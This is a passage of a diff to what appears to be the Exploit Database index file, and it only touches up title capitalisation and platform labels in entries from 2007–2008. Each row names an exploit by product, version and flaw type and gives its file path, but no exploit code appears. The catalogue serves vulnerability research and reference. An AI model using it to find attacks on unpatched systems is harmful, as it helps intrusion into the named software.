1.2 - (qti_checkname.php) Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 @@ -3826,8 +3826,8 @@ id,file,description,date,author,platform,type,port 4176,platforms/windows/remote/4176.html,"SecureBlackbox (PGPBBox.dll 5.1.0.112) - Arbitrary Data Write Exploit",2007-07-12,callAX,windows,remote,0 4177,platforms/windows/remote/4177.html,"Program Checker - (sasatl.dll 1.5.0.531) DebugMsgLog Heap Spraying Exploit",2007-07-12,callAX,windows,remote,0 4178,platforms/windows/local/4178.txt,"Symantec AntiVirus - symtdi.sys Privilege Escalation",2007-07-12,"Zohiartze Herce",windows,local,0 -4179,platforms/php/webapps/4179.php,"MkPortal 1.1.1 reviews / gallery modules - SQL Injection",2007-07-12,Coloss,php,webapps,0 -4180,platforms/php/webapps/4180.txt,"MKPortal NoBoard Module (BETA) - Remote File Inclusion",2007-07-14,g00ns,php,webapps,0 +4179,platforms/php/webapps/4179.php,"MkPortal 1.1.1 reviews / Gallery modules - SQL Injection",2007-07-12,Coloss,php,webapps,0 +4180,platforms/php/webapps/4180.txt,"MKPortal NoBoard Module (Beta)- Remote File Inclusion",2007-07-14,g00ns,php,webapps,0 4181,platforms/multiple/dos/4181.php,"PHP 5.2.3 - glob() Denial of Service",2007-07-14,shinnai,multiple,dos,0 4182,platforms/php/webapps/4182.txt,"CMScout 1.23 - 'index.php' SQL Injection",2007-07-14,g00ns,php,webapps,0 4183,platforms/php/webapps/4183.txt,"eSyndiCat Directory Software - Multiple SQL Injections",2007-07-14,d3v1l,php,webapps,0 @@ -3858,7 +3858,7 @@ id,file,description,date,author,platform,type,port 4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition - (displaycat catid) SQL Injection",2007-07-21,t0pP8uZz,php,webapps,0 4210,platforms/php/webapps/4210.txt,"RGameScript Pro - (page.php id) Remote File Inclusion",2007-07-21,Warpboy,php,webapps,0 4211,platforms/php/webapps/4211.htm,"JBlog 1.0 - Create / Delete Admin Authentication Bypass Exploit",2007-07-21,s4mi,php,webapps,0 -4212,platforms/php/webapps/4212.txt,"Joomla! CMS 1.5 beta 2 - (search) Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0 +4212,platforms/php/webapps/4212.txt,"Joomla! CMS 1.5 Beta 2 - (search) Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0 4213,platforms/php/webapps/4213.txt,"bwired - (index.php newsID) SQL Injection",2007-07-22,g00ns,php,webapps,0 4214,platforms/windows/remote/4214.html,"Zenturi NixonMyPrograms Class (sasatl.dll 1.5.0.531) - Remote Buffer Overflow",2007-07-23,shinnai,windows,remote,0 4215,platforms/windows/dos/4215.pl,"Microsoft Windows - Explorer.exe Gif Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos,0 @@ -3929,17 +3929,17 @@ id,file,description,date,author,platform,type,port 4280,platforms/windows/remote/4280.pl,"Savant 3.1 - GET Request Remote Overflow (Universal)",2007-08-12,"Jacopo Cervini",windows,remote,80 4281,platforms/windows/dos/4281.c,"WengoPhone 2.x - SIP Phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos,0 4282,platforms/php/webapps/4282.txt,"SOTEeSKLEP 3.5RC9 - (file) Remote File Disclosure",2007-08-13,dun,php,webapps,0 -4283,platforms/windows/remote/4283.pl,"Racer 0.5.3 beta 5 - Remote Buffer Overflow",2007-08-13,n00b,windows,remote,26000 +4283,platforms/windows/remote/4283.pl,"Racer 0.5.3 Beta 5 - Remote Buffer Overflow",2007-08-13,n00b,windows,remote,26000 4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script - (category.php cat) SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 4285,platforms/windows/dos/4285.c,"CounterPath X-Lite 3.x - SIP phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos,0 4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Login Bypass SQL Injection",2007-08-14,s4squatch,cgi,webapps,0 4287,platforms/windows/remote/4287.py,"SurgeMail 38k - (SEARCH) Remote Buffer Overflow",2007-08-14,"Joey Mengele",windows,remote,143 -4288,platforms/windows/dos/4288.c,"WireShark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,windows,dos,0 +4288,platforms/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,windows,dos,0 4289,platforms/windows/dos/4289.php,"Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos,0 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - (search.php query) SQL Injection",2007-08-16,RoXur777,php,webapps,0 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure Exploit",2007-08-17,Pravus,windows,remote,0 -4293,platforms/windows/dos/4293.php,"PHP 5.2.0 - (php_win32sti) Local Buffer Overflow PoC (Win32)",2007-08-18,boecke,windows,dos,0 +4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows/x86) - (php_win32sti) Local Buffer Overflow PoC",2007-08-18,boecke,windows,dos,0 4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Pre-Authenticated Stack Based Overrun PoC",2007-08-18,eliteboy,windows,dos,0 4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0 @@ -3964,7 +3964,7 @@ id,file,description,date,author,platform,type,port 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Pre-Authenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Pre-Authenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion",2007-08-26,bd0rk,php,webapps,0 -4318,platforms/windows/dos/4318.php,"PHP 5.2.0 - (php_iisfunc.dll) Local Buffer Overflow PoC (Win32)",2007-08-27,boecke,windows,dos,0 +4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows/x86) - (php_iisfunc.dll) Local Buffer Overflow PoC",2007-08-27,boecke,windows,dos,0 4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0 4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - (include.php skindir) Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0 @@ -4043,7 +4043,7 @@ id,file,description,date,author,platform,type,port 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - (VBTOVSI.dll 1.0.0.0) File Overwrite",2007-09-11,shinnai,windows,remote,0 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - (root_path) Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0 -4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 <= 2.2.2 Plugin - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0 +4397,platforms/php/webapps/4397.rb,"Wordpress 1.5.1.1 <= 2.2.2 Plugin - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0 4398,platforms/windows/remote/4398.html,"Microsoft SQL Server - Distributed Management Objects Buffer Overflow Exploit",2007-09-12,96sysim,windows,remote,0 4399,platforms/multiple/remote/4399.html,"Apple Quicktime (Multiple Browsers) - Command Execution PoC",2007-09-12,pdp,multiple,remote,0 4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection",2007-09-13,Houssamix,php,webapps,0 @@ -4106,7 +4106,7 @@ id,file,description,date,author,platform,type,port 4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) SQL Injection",2007-09-26,ka0x,asp,webapps,0 4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.x - (catId) SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0 4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0 -4461,platforms/php/webapps/4461.txt,"lustig.cms BETA 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0 +4461,platforms/php/webapps/4461.txt,"lustig.cms Beta 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0 4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0 4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0 @@ -4190,7 +4190,7 @@ id,file,description,date,author,platform,type,port 4542,platforms/linux/remote/4542.py,"Boa 0.93.15 - HTTP Basic Authentication Bypass Exploit",2007-10-16,ikki,linux,remote,0 4543,platforms/php/webapps/4543.txt,"PHPDJ 0.5 - 'djpage.php' Remote File Inclusion",2007-10-17,GoLd_M,php,webapps,0 4544,platforms/php/webapps/4544.txt,"LimeSurvey 1.52 - (language.php) Remote File Inclusion",2007-10-17,S.W.A.T.,php,webapps,0 -4545,platforms/php/webapps/4545.txt,"awzMB 4.2 beta 1 - Multiple Remote File Inclusion",2007-10-18,S.W.A.T.,php,webapps,0 +4545,platforms/php/webapps/4545.txt,"awzMB 4.2 Beta 1 - Multiple Remote File Inclusion",2007-10-18,S.W.A.T.,php,webapps,0 4546,platforms/php/webapps/4546.txt,"ZZ FlashChat 3.1 - (help.php) Local File Inclusion",2007-10-19,d3hydr8,php,webapps,0 4547,platforms/php/webapps/4547.pl,"Simple Machines Forum 1.1.3 - Blind SQL Injection",2007-10-20,"Michael Brooks",php,webapps,0 4548,platforms/php/webapps/4548.php,"Vanilla 1.1.3 - Blind SQL Injection",2007-10-20,InATeam,php,webapps,0 @@ -4237,11 +4237,11 @@ id,file,description,date,author,platform,type,port 4589,platforms/php/webapps/4589.htm,"PHP-AGTC membership system 1.1a - Remote Add Admin Exploit",2007-10-30,0x90,php,webapps,0 4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 - download.php Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 -4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps,0 -4594,platforms/windows/remote/4594.html,"SonicWall SSL-VPN - NeLaunchCtrl ActiveX Control Remote Exploit",2007-11-01,krafty,windows,remote,0 +4593,platforms/php/webapps/4593.txt,"Wordpress Plugin BackUpWordpress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps,0 +4594,platforms/windows/remote/4594.html,"SonicWALL SSL-VPN - NeLaunchCtrl ActiveX Control Remote Exploit",2007-11-01,krafty,windows,remote,0 4595,platforms/php/webapps/4595.txt,"Synergiser 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4596,platforms/php/webapps/4596.txt,"Scribe 0.2 - Remote PHP Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 -4597,platforms/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 +4597,platforms/php/webapps/4597.txt,"DM GuestBook 0.4.1 - Multiple Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 4598,platforms/windows/remote/4598.html,"EDraw Flowchart ActiveX Control 2.0 - Insecure Method Exploit",2007-11-02,shinnai,windows,remote,0 4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - (index.php module) Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 4600,platforms/linux/dos/4600.py,"Firefly Media Server 0.2.4 - Remote Denial of Service",2007-11-02,nnp,linux,dos,0 @@ -4268,7 +4268,7 @@ id,file,description,date,author,platform,type,port 4621,platforms/php/webapps/4621.txt,"patBBcode 1.0 - bbcodeSource.php Remote File Inclusion",2007-11-12,p4sswd,php,webapps,0 4622,platforms/php/webapps/4622.txt,"Myspace Clone Script - SQL Injection",2007-11-13,t0pP8uZz,php,webapps,0 4623,platforms/php/webapps/4623.txt,"Toko Instan 7.6 - Multiple SQL Injections",2007-11-14,k1tk4t,php,webapps,0 -4624,platforms/osx/dos/4624.c,"Apple Mac OS X 10.4.x Kernel - i386_set_ldt() Integer Overflow PoC",2007-11-16,"RISE Security",osx,dos,0 +4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow PoC",2007-11-16,"RISE Security",osx,dos,0 4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - .MDB File Parsing Stack Overflow PoC",2007-11-16,cocoruder,windows,local,0 4626,platforms/php/webapps/4626.txt,"Joomla Component Carousel Flash Image Gallery - Remote File Inclusion",2007-11-16,Crackers_Child,php,webapps,0 4627,platforms/php/webapps/4627.txt,"ProfileCMS 1.0 - 'id' SQL Injection",2007-11-16,K-159,php,webapps,0 @@ -4294,7 +4294,7 @@ id,file,description,date,author,platform,type,port 4647,platforms/cgi/webapps/4647.txt,"KB-Bestellsystem - (kb_whois.cgi) Command Execution",2007-11-22,"Zero X",cgi,webapps,0 4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote SEH Overwrite PoC",2007-11-23,h07,multiple,dos,0 4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - SQL Injection",2007-11-23,"Aria-Security Team",php,webapps,0 -4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 beta 5 - (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0 +4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 Beta 5 - (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0 4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 - RSTP Response Code Execution Exploit (Vista/XP)",2007-11-24,InTeL,windows,remote,0 4652,platforms/php/webapps/4652.txt,"Amber Script 1.0 - (show_content.php id) Local File Inclusion",2007-11-24,Crackers_Child,php,webapps,0 4653,platforms/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - events.php SQL Injection",2007-11-24,ka0x,php,webapps,0 @@ -4317,7 +4317,7 @@ id,file,description,date,author,platform,type,port 4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - (include.php) Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0 4671,platforms/php/webapps/4671.txt,"EHCP 0.22.8 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0 4672,platforms/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0 -4673,platforms/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 - RSTP Response Universal Exploit (win/osx)",2007-11-29,"Subreption LLC.",multiple,remote,0 +4673,platforms/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal Exploit",2007-11-29,"Subreption LLC.",multiple,remote,0 4674,platforms/php/webapps/4674.txt,"TuMusika Evolution 1.7R5 - Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 4675,platforms/php/webapps/4675.txt,"NoAh 0.9 pre 1.2 - (filepath) Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 4676,platforms/php/webapps/4676.txt,"Web-MeetMe 3.0.3 - (play.php) Remote File Disclosure",2007-11-29,Evil.Man,php,webapps,0 @@ -4333,13 +4333,13 @@ id,file,description,date,author,platform,type,port 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0 4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 4688,platforms/windows/dos/4688.html,"VLC 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization PoC",2007-12-04,"Ricardo Narvaja",windows,dos,0 -4689,platforms/osx/dos/4689.c,"Apple Mac OS X xnu 1228.0 - mach-o Local Kernel Denial of Service PoC",2007-12-04,mu-b,osx,dos,0 -4690,platforms/osx/dos/4690.c,"Apple Mac OS X 10.5.0 - (leopard) vpnd Remote Denial of Service PoC",2007-12-04,mu-b,osx,dos,0 +4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service PoC",2007-12-04,mu-b,osx,dos,0 +4690,platforms/osx/dos/4690.c,"Apple Mac OSX 10.5.0 - (leopard) vpnd Remote Denial of Service PoC",2007-12-04,mu-b,osx,dos,0 4691,platforms/php/webapps/4691.txt,"Mambo/Joomla Component rsgallery 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0 4692,platforms/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service",2007-12-05,MADYNES,hardware,dos,0 4693,platforms/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 4694,platforms/php/webapps/4694.txt,"ezContents 1.4.5 - (index.php link) Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 -4695,platforms/php/webapps/4695.txt,"WordPress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0 +4695,platforms/php/webapps/4695.txt,"Wordpress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0 4696,platforms/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Remote File Inclusion / Local File Inclusion Vulnerabilities",2007-12-06,GoLd_M,php,webapps,0 4697,platforms/asp/webapps/4697.txt,"MWOpen E-Commerce - leggi_commenti.asp SQL Injection",2007-12-06,KiNgOfThEwOrLd,asp,webapps,0 4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0 @@ -4365,9 +4365,9 @@ id,file,description,date,author,platform,type,port 4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Plugin - deletekey() Command Injection Exploit",2007-12-11,Backdoored,php,webapps,0 4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - (index.php template) Local File Inclusion",2007-12-11,MhZ91,php,webapps,0 4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution Exploit",2007-12-11,porkythepig,windows,remote,0 -4721,platforms/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0 +4721,platforms/php/webapps/4721.txt,"Wordpress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0 4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 -4723,platforms/osx/dos/4723.c,"Apple Mac OS X xnu 1228.0 - super_blob Local kernel Denial of Service PoC",2007-12-12,mu-b,osx,dos,0 +4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - super_blob Local kernel Denial of Service PoC",2007-12-12,mu-b,osx,dos,0 4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow Exploit",2007-12-12,muts,windows,remote,80 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 - config[fsBase] Remote File Inclusion",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0 4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 - head.php Remote File Inclusion",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0 @@ -4397,12 +4397,12 @@ id,file,description,date,author,platform,type,port 4750,platforms/php/webapps/4750.txt,"phpMyRealty 1.0.x - (search.php type) SQL Injection",2007-12-18,Koller,php,webapps,0 4751,platforms/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Stack Overflow",2007-12-18,"SYS 49152",windows,local,0 4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 - Arbitrary File Upload",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 -4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g - logurl() Remote Buffer Overflow (Win32) (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 +4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g (Windows/x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - Bluetooth Stack Privilege Escalation",2007-12-18,Backdoored,linux,local,0 4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - (view.php list) Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0 -4759,platforms/osx/local/4759.c,"Apple Mac OS X - mount_smbfs Stack Based Buffer Overflow",2007-12-19,"Subreption LLC.",osx,local,0 +4759,platforms/osx/local/4759.c,"Apple Mac OSX - mount_smbfs Stack Based Buffer Overflow",2007-12-19,"Subreption LLC.",osx,local,0 4760,platforms/windows/remote/4760.txt,"Microsoft Windows 2000 - AS SP4 Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25 4762,platforms/php/webapps/4762.txt,"nicLOR CMS - (sezione_news.php) SQL Injection",2007-12-21,x0kster,php,webapps,0 @@ -4465,7 +4465,7 @@ id,file,description,date,author,platform,type,port 4820,platforms/windows/remote/4820.html,"IBM Domino Web Access Upload Module - dwa7w.dll Buffer Overflow Exploit",2007-12-30,Elazar,windows,remote,0 4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - (viewdir id) SQL Injection",2007-12-31,MhZ91,php,webapps,0 4822,platforms/php/webapps/4822.txt,"MyPHP Forum 3.0 - (Final) Multiple SQL Injection",2007-12-31,x0kster,php,webapps,0 -4823,platforms/php/webapps/4823.pl,"Zenphoto 1.1.3 - (rss.php albumnr) SQL Injection",2007-12-31,Silentz,php,webapps,0 +4823,platforms/php/webapps/4823.pl,"ZenPhoto 1.1.3 - (rss.php albumnr) SQL Injection",2007-12-31,Silentz,php,webapps,0 4824,platforms/asp/webapps/4824.py,"oneSCHOOL - admin/login.asp SQL Injection",2007-12-31,Guga360,asp,webapps,0 4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow Exploit",2007-12-31,Elazar,windows,remote,0 4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - (index.php m) SQL Injection",2007-12-31,x0kster,php,webapps,0 @@ -4486,7 +4486,7 @@ id,file,description,date,author,platform,type,port 4841,platforms/php/webapps/4841.txt,"Invision Power Board 2.1.7 - ACTIVE Cross-Site Scripting / SQL Injection",2008-01-05,"Eugene Minaev",php,webapps,0 4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 - (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0 4843,platforms/php/webapps/4843.txt,"modx CMS 0.9.6.1 - Multiple Vulnerabilities",2008-01-05,BugReport.IR,php,webapps,0 -4844,platforms/php/webapps/4844.txt,"WordPress Plugin Wp-FileManager 1.2 - Remote Upload",2008-01-06,Houssamix,php,webapps,0 +4844,platforms/php/webapps/4844.txt,"Wordpress Plugin Wp-FileManager 1.2 - Remote Upload",2008-01-06,Houssamix,php,webapps,0 4845,platforms/php/webapps/4845.pl,"RunCMS Newbb_plus 0.92 - Client IP SQL Injection",2008-01-06,"Eugene Minaev",php,webapps,0 4846,platforms/php/webapps/4846.txt,"Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion",2008-01-06,"Eugene Minaev",php,webapps,0 @@ -4580,7 +4580,7 @@ id,file,description,date,author,platform,type,port 4936,platforms/php/webapps/4936.txt,"Gradman 0.1.3 - (info.php tabla) Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0 4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 - (linkbar.php cfile) Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - (.dsr) File Handling Buffer Overflow Exploit",2008-01-18,shinnai,windows,local,0 -4939,platforms/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",php,webapps,0 +4939,platforms/php/webapps/4939.txt,"Wordpress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",php,webapps,0 4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 - (upload.php language) Local File Inclusion Exploit",2008-01-20,shinmai,php,webapps,0 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0 4942,platforms/php/webapps/4942.txt,"TikiWiki < 1.9.9 - tiki-listmovies.php Directory Traversal",2008-01-20,Sha0,php,webapps,0 @@ -4632,8 +4632,8 @@ id,file,description,date,author,platform,type,port 4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0 4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",php,webapps,0 4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion",2008-01-26,Stack,php,webapps,0 -4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 -4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 +4992,platforms/php/webapps/4992.txt,"Wordpress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 +4993,platforms/php/webapps/4993.txt,"Wordpress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - pitrig_truncate PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys password)",2008-01-28,sh2kerr,multiple,local,0 @@ -4644,7 +4644,7 @@ id,file,description,date,author,platform,type,port 5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - dispatcher.php Remote File Disclosure",2008-01-28,Stack,php,webapps,0 5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - pollid SQL Injection",2008-01-29,D4m14n,php,webapps,0 5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0 -5004,platforms/windows/local/5004.c,"Safenet IPSecDrv.sys 10.4.0.12 - Local kernel ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 +5004,platforms/windows/local/5004.c,"SafeNet IPSecDrv.sys 10.4.0.12 - Local kernel ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - (ChilkatCert.dll) Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0 5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0 5007,platforms/php/webapps/5007.txt,"Mambo Component Newsletter - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0 @@ -4653,11 +4653,11 @@ id,file,description,date,author,platform,type,port 5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0 5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0 5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion 